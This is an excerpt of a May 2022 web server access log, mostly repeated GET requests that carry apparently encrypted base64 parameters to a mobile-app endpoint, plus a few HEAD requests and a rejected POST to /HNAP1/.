186.102.16.94 - - [15/May/2022:12:45:33 -0500] "GET /kwssiamovil/sm/acme/a?s=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&u=U2FsdGVkX1+fYc71scxNf5Y+sSrnsIkQEQj+25NE+8PexpUCC5sK895niUF4qmRc&y=U2FsdGVkX19otMwRn9+JZ53V7mvhyqGtu1HB2MAoDmgPtvCos00K0VUUt4Qosior HTTP/1.1" 200 25
186.102.16.94 - - [15/May/2022:12:45:33 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX1/15+aiu50kn3TFtLz/eBbs0BDxaBX5IQl23pBhGPE+U9QkG968fEg1uXf8f/wRp4V+Hc38IjlVCA9IEfl8NANzYzTykg/sVxVl47ymeophaV1PXQb4C2j9uZF4HUKbxulVTV/go8cwdZoObl7AJKOvaW5h/u9efKQ=&u=U2FsdGVkX1+fYc71scxNf5Y+sSrnsIkQEQj+25NE+8PexpUCC5sK895niUF4qmRc&y=U2FsdGVkX19otMwRn9+JZ53V7mvhyqGtu1HB2MAoDmgPtvCos00K0VUUt4Qosior HTTP/1.1" 200 25
186.102.16.94 - - [15/May/2022:12:45:34 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX1+LSjaUqVzY811s8dYQc+KskbyLjZzlCpyZ91NRur/HLPBjRT7pY061J68Aw20IIDw4QkrM8JavZur8CQvKyqmGLFC3DSESlztif15hBM0bAYSfKZ3I/OvkO+NmZS7KOpaRjvSgC41niXCfnTwzI16WafCW5aYw1ks=&u=U2FsdGVkX1+fYc71scxNf5Y+sSrnsIkQEQj+25NE+8PexpUCC5sK895niUF4qmRc&y=U2FsdGVkX19otMwRn9+JZ53V7mvhyqGtu1HB2MAoDmgPtvCos00K0VUUt4Qosior HTTP/1.1" 200 25
186.102.16.94 - - [15/May/2022:12:45:34 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX1+tkcstnfs7qbEYtyZYhARlAdBRY363J8d189hYMOM4LhDQ38mwVFVSlRg2sRV0O2CFztHiLytOW6pYwWIAzxKp7PojpgKbcKSs1//bsLGuKmdWAhbIIaYGQFz2fi9/Zeti7CPlP8y2ZGzm8zz8+B8CY5ksyjc1rpg=&u=U2FsdGVkX1+fYc71scxNf5Y+sSrnsIkQEQj+25NE+8PexpUCC5sK895niUF4qmRc&y=U2FsdGVkX19otMwRn9+JZ53V7mvhyqGtu1HB2MAoDmgPtvCos00K0VUUt4Qosior HTTP/1.1" 200 25
186.102.16.94 - - [15/May/2022:12:45:34 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX19lj3B0oI1D84F1+hSFOYMFCod5l7QKv4u1NTJNF6OSY55uOdkBM5ZhwYItI7lqrJxtKbez5qdslRr2oJBsGVQQtqL4WMJ0YbenqjgzFUKiQ5iw/3PV6kTApUfLPwybp4KYDrmkWkYIof49AcB5BZLVkP9QhlW6eaYzswMgjg6PAdAxmB5DwzLa&u=U2FsdGVkX1+fYc71scxNf5Y+sSrnsIkQEQj+25NE+8PexpUCC5sK895niUF4qmRc&y=U2FsdGVkX19otMwRn9+JZ53V7mvhyqGtu1HB2MAoDmgPtvCos00K0VUUt4Qosior HTTP/1.1" 200 25
172.22.2.4 - - [15/May/2022:12:45:07 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
27.40.118.167 - - [15/May/2022:12:47:20 -0500] "POST /HNAP1/ HTTP/1.0" 400 945
216.245.221.92 - - [15/May/2022:12:47:36 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [15/May/2022:12:45:58 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57044
186.102.49.18 - - [15/May/2022:12:50:44 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX18zSwEXJLkrlCixGba69OgbTDfYiBHzIw+9IGiynfVycEe0+OyVTgPsM/q3gH/Q6EDXwYlqyUm/uJX+E2317Buy3W1+Rgu6Cd61z3lv1ezy0eC+otorM0qq0X1NbHNr0tVHU574dbDHdWxvjDmzD1JSe+NDB3Z4IhLghsAXzZd+zjlBTLgOBO24j9r7bljtfndAVZhpsaQ9qcXw7n89eAFqxnZJ8NS+OKuEKeE6Zr1g4H5MmH4UZMdrmufFB1fKPztf4OWXULCueg==&u=U2FsdGVkX1/UkuFsFbVBVps/CKoDoFXnbPBSP6rWL+w=&y=U2FsdGVkX1+F9he4eCmfJAccdYlE//MVYBP8XLQTXOJiWPGE38ybxwVNvf0OKloM HTTP/1.1" 200 25
